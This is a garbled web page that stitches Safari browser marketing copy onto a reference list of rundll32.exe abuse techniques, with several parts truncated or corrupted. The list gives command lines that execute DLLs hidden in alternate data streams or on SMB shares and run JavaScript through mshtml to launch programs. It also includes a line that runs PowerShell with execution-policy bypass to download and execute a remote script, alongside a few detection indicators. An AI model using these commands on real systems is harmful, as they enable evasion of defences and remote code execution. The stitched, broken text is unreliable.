


Something you put up with if you wanted to surf the Internet. Meet Safari, a browser unlike any you’ve ever seen.īefore Safari, browsers were an afterthought. And it’s so smart, it even checks your spelling and grammar. It shows you your favorite sites at a glance. It works on iPad, iPhone, iPod touch, Mac, and PC. OS: Windows vista, Windows 7, Windows 8, Windows 8.It renders web pages at lightning speed. Usecase: Execute code from alternate data stream Rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain DLL file stored in an Alternate Data Stream (ADS). OS: Windows 10 (and likely previous versions), Windows 11 Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Use Rundll32.exe to load a registered or hijacked COM Server payload. Rundll32.exe javascript:"\.\mshtml,RunHTMLApplication " document.write() GetObject("script:") Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Rundll32.exe javascript:"\.\mshtml,RunHTMLApplication " document.write() h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true) try Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Rundll32.exe javascript:"\.\mshtml.dll,RunHTMLApplication " eval("w=new%20ActiveXObject(\"WScript.Shell\") w.run(\"calc\") window.close()") Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Rundll32.exe javascript:"\.\mshtml,RunHTMLApplication " document.write() new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(' Usecase: Execute code from Internet Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. EntryPoint is the name of the entry point in the. Use Rundll32.exe to execute a DLL from a SMB share. OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 DLL file and EntryPoint would be the name of the entry point in the. IOC: Suspicious use of cmdline flags such as -staĪllTheThings圆4 would be a.IOC: Outbount Internet/network connections made from rundll32.
